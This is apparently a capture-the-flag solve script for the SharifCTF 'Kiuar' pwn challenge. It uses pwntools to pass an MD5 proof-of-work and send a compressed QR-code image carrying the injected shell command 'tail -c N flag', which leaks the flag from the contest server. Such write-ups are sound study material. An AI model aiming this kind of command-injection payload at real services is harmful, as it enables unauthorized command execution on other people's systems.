Last active
February 7, 2016 19:58
SharifCTF pwn 200 Kiuar
from pwn import * | |
from hashlib import * | |
import zlib | |
import qrcode | |
# Uncomment for verbose pwntools logging:
# context.log_level = 'debug'
# Challenge service from the task description: telnet ctf.sharif.edu 12432
HOST, PORT = "ctf.sharif.edu", 12432
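def create_qrcode(cmd):
    """Render *cmd* as a QR code and return it as a padded zlib blob.

    The QR code (starting at version 1, lowest error-correction level,
    1-pixel boxes, 1-module border) is saved to ``Qr-cmd.png`` in the current
    directory, read back, compressed at the highest zlib level and then
    passed through ``pad_img``.

    Args:
        cmd: Text to encode in the QR code.

    Returns:
        The zlib-compressed PNG data as returned by ``pad_img``.
    """
    qr = qrcode.QRCode(
        version=1,
        error_correction=qrcode.constants.ERROR_CORRECT_L,
        box_size=1,
        border=1,
    )
    qr.add_data(cmd)
    # fit=True lets the library pick a larger version if cmd does not fit.
    qr.make(fit=True)
    image = qr.make_image()

    # PNG is binary data: use "wb"/"rb" so no newline translation can corrupt
    # it, and let the context managers close the file even if save() raises.
    with open("Qr-cmd.png", "wb") as png_out:
        image.save(png_out, "png")
    with open("Qr-cmd.png", "rb") as png_in:
        png_bytes = png_in.read()

    compressed = zlib.compress(png_bytes, zlib.Z_BEST_COMPRESSION)
    return pad_img(compressed)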
def get_binary(line):
    """Return the 22-character field that starts at index 67 of *line*.

    The caller passes the server's 'Give' line and uses the result as the
    binary prefix to match. Shorter input yields a shorter (possibly empty)
    string rather than an error.
    """
    offset, width = 67, 22
    return line[offset:offset + width]
def get_integer(bin_prefix): | |
for i in xrange(1000000000,10000000000000000): | |
if(bin(int(md5(hex(i)[2:]).hexdigest(),16))[2:24] == bin_prefix): | |
return [hex(i)[2:] , md5(hex(i)[2:]).hexdigest()] | |
return False | |
def pad_img(img):
    """Right-pad *img* with ``\\x90`` characters up to a length of 200.

    Input that is already 200 characters or longer is returned unchanged.
    """
    return img.ljust(200, "\x90")
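def get_chunk():
    """Run the challenge exchange once per tail length and assemble the flag.

    For each length in ``[19, 36]`` this opens a new connection to
    ``HOST:PORT``, builds the QR payload for ``tail -c <length> flag``, reads
    the line starting with 'Give', extracts the requested binary prefix,
    finds a matching value with ``get_integer``, sends it, waits for the next
    'T' from the server, sends the payload and reads the reply. Everything
    from index 103 of the reply is treated as the leaked chunk and prepended
    to the chunks collected so far.

    Returns:
        ``'SharifCT'`` followed by the concatenated chunks.
    """
    tail_lengths = [19, 36]
    flag = ''
    for length in tail_lengths:
        cnx = remote(HOST, PORT)
        # Close the connection on every path; the loop opens a new one per
        # chunk, so an unclosed socket would otherwise leak each iteration.
        try:
            cmd = "tail -c " + str(length) + " flag"
            data = create_qrcode(cmd)
            print("[+] Qr-code compressed Zlib image created")
            line = cnx.recvline_startswith('Give', True)
            cnx.recv()
            prefix = get_binary(line)
            print("[+] prefix: " + prefix)
            print("[+] Bruteforcing md5 hash")
            # Named 'digest' rather than 'md5' so the hashlib function is not
            # shadowed inside this function.
            integer, digest = get_integer(prefix)
            print("[+] integer is: " + integer)
            print("[+] md5 hash is: " + digest)
            print("[+] Sending the integer")
            cnx.send(integer)
            cnx.recvuntil('T')
            print("[+] Sending compressed image")
            cnx.send(data)
            resp = cnx.recv()
        finally:
            cnx.close()
        leaked = resp[103:]
        print("[+] Chunk leaked: " + leaked + "\n")
        flag = leaked + flag
    return 'SharifCT' + flag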
# Script entry point: recover the flag and print it.
flag = get_chunk()
print("[+] The final flag is: " + flag)